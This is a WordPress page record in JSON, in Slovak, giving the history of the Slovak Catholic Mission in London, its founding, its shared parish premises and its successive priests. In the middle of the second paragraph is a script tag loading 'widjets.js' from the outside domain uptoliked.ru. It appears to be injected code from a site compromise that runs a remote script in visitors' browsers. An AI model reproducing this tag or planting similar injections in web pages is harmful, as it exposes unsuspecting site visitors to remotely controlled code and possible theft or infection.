{"id":9778,"date":"2010-10-26T22:07:36","date_gmt":"2010-10-26T21:07:36","guid":{"rendered":"http:\/\/www.scmlondon.org\/?page_id=9778"},"modified":"2014-06-28T11:36:16","modified_gmt":"2014-06-28T10:36:16","slug":"historia","status":"publish","type":"page","link":"https:\/\/www.scmlondon.org\/?page_id=9778","title":{"rendered":"HIST\u00d3RIA"},"content":{"rendered":"<p style=\"text-align: justify;\">Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne (SCM) je zriaden\u00e1 z rozhodnutia Konferencie biskupov Slovenska pre Slov\u00e1kov \u017eij\u00facich vo Ve\u013ekej Brit\u00e1nii.<br \/>\nMons. ThDr. Jozef Ha\u013eko, pomocn\u00fd bratislavsk\u00fd biskup, je za KBS poveren\u00fd pastora\u010dnou starostlivos\u0165ou o Slov\u00e1kov \u017eij\u00facich v zahrani\u010d\u00ed.<br \/>\nSCM chce nadviaza\u0165 na dlhoro\u010dn\u00fa trad\u00edciu katol\u00edckych misi\u00ed v in\u00fdch krajin\u00e1ch Eur\u00f3py a Ameriky, ktor\u00e9 sa v duchu kres\u0165anskej viery a potrieb Slov\u00e1kov \u017eij\u00facich v zahrani\u010d\u00ed st\u00e1li ich druh\u00fdm domovom alebo i \u00fato\u010diskom v r\u00f4znych \u017eivotn\u00fdch situ\u00e1ci\u00e1ch a potreb\u00e1ch.<\/p>\n<p style=\"text-align: justify;\">SCM m\u00e1 historicky korene e\u0161te v polovici minul\u00e9ho storo\u010dia. Od roku 1949 vznikla v Lond\u00fdne \u010cesko-Moravsko-Slovensk\u00e1 katol\u00edcka misia, ktor\u00fa zalo\u017eil otec Jan Lang \/*1919\/, SJ, rod\u00e1k z Rajhradu pri Brne. V roku 1964 k\u00fapil dom a zalo\u017eil Velehrad, kde misia fungovala ako n\u00e1bo\u017eensk\u00e9, kult\u00farne a spolo\u010densko-soci\u00e1lne centrum pre krajanov z \u010ciech, Moravy a Slovenska.<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/p>\n<p style=\"text-align: justify;\">Od roku 2004 bol vyslan\u00fd 1. slovensk\u00fd k\u0148az, dp. Mgr. Jozef Vojtek, rod\u00e1k z Var\u00edna, k\u0148az Nitrianskej diec\u00e9zy, ktor\u00fd mu vypom\u00e1hal.<\/p>\n<p style=\"text-align: justify;\">Od roku 2007 (po smrti P. Jozefa Langa \/+2007\/) sa misia osamostatnila a vznikol tak nov\u00fd subjekt, ktor\u00fd m\u00e1 s\u00fa\u010dasn\u00e9 pomenovanie SLOVENSK\u00c1 KATOL\u00cdCKA MISIA v LOND\u00ddNE a patr\u00ed pod diec\u00e9zu Westminster. Je s\u00fa\u010das\u0165ou jednej z troch lond\u00fdnskych diec\u00e9z ako etnick\u00e1 skupina. Zdie\u013ea priestory sa anglickou farnos\u0165ou Our Lady of La Salette and St. Joseph (Bermondsey) ne\u010faleko London Bridge na \u00fazem\u00ed diec\u00e9zy Southwark, nako\u013eko doposia\u013e nem\u00e1 svoje vlastn\u00e9 priestory. Pastora\u010dn\u00e1 starostlivos\u0165 zahr\u0148uje veriacich na \u00fazem\u00ed Anglicka a Walesu. S\u00fa\u010dasn\u00fdm s\u00eddlom SCM je kostol Our Lady of La Salette and St. Joseph na 14 Melior Street v Lond\u00fdne (SE1 3QP).<\/p>\n<p style=\"text-align: justify;\">Od j\u00fala roku 2010 je jej duchovn\u00fdm spr\u00e1vcom Mgr. Tibor Borovsk\u00fd, rod\u00e1k z Nitry, k\u0148az \u017dilinskej diec\u00e9zy, ktor\u00fd vymenil v tejto poz\u00edcii predchodcu.<\/p>\n<p style=\"text-align: justify;\">Od novembra 2011 SCM do j\u00fana 2013 vypom\u00e1hala SCM sr. Annuntiata, CJ.<\/p>\n<p style=\"text-align: justify;\">Od janu\u00e1ra 2012 bol KBS do Lond\u00fdna menovan\u00fd tie\u017e dp. Mgr. Martin Demo, k\u0148az Ko\u0161ickej eparchie, pre veriacich v\u00fdchodn\u00e9ho (byzantsk\u00e9ho) obradu.<\/p>\n<h3>Related Images:<\/h3>","protected":false},"excerpt":{"rendered":"<p>Slovensk\u00e1 katol\u00edcka misia v Lond\u00fdne (SCM) je zriaden\u00e1 z rozhodnutia Konferencie biskupov Slovenska pre Slov\u00e1kov \u017eij\u00facich vo Ve\u013ekej Brit\u00e1nii. Mons. ThDr. Jozef Ha\u013eko, pomocn\u00fd bratislavsk\u00fd biskup, je za KBS poveren\u00fd&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?page_id=9778\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"parent":15711,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-9778","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/9778","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9778"}],"version-history":[{"count":15,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/9778\/revisions"}],"predecessor-version":[{"id":17026,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/9778\/revisions\/17026"}],"up":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15711"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9778"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}